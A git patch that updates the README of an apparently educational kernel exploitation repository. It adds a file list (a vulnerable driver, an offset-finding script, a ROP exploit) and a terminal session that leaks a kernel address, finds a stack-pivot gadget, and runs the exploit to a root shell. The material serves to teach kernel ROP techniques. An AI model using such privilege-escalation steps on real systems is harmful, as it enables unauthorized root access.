From 29f751183fa7423b8fb3fd163222928ea7ef6f5c Mon Sep 17 00:00:00 2001
From: Hashcrack <vnik5287@gmail.com>
Date: Thu, 23 Jun 2016 10:29:49 +1000
Subject: [PATCH] updated readme

---
 README.md | 19 +++++++++++++++++++
 1 file changed, 19 insertions(+)

diff --git a/README.md b/README.md
index 448eff4..a4c2c4c 100644
--- a/README.md
+++ b/README.md
@@ -13,6 +13,8 @@ the function address to be executed.
 * drv.c - vulnerable kernel driver
 * trigger.c - user-space application to trigger the OOB access via the provided
   ioctl
+* find_offset.py - helper script for finding the correct offset into the "ops" array
+* rop_exploit.c - ROP exploit for the "drv.c" kernel driver
 
 The goal is to construct and execute a ROP chain that will satisfy the
 following requirements:
@@ -21,3 +23,20 @@ following requirements:
 * Data residing in user space may be referenced (i.e., "fetching" data from
   user space is allowed)
 * Instructions residing in user space may not be executed
+
+```
+vnik@ubuntu:~$ dmesg | grep addr | grep ops
+[  244.142035] addr(ops) = ffffffffa02e9340
+vnik@ubuntu:~$ ~/find_offset.py ffffffffa02e9340 ~/gadgets 
+offset = 18446744073644231139
+gadget = xchg eax, esp ; ret 0x11e8
+stack addr = 8108e258
+
+vnik@ubuntu:~/kernel_rop/vulndrv$ gcc rop_exploit.c -O2 -o rop_exploit
+vnik@ubuntu:~/kernel_rop/vulndrv$ ./rop_exploit 18446744073644231139 ffffffffa02e9340
+array base address = 0xffffffffa02e9340
+stack address = 0x8108e258
+# id    
+uid=0(root) gid=0(root) groups=0(root)
+# 
+```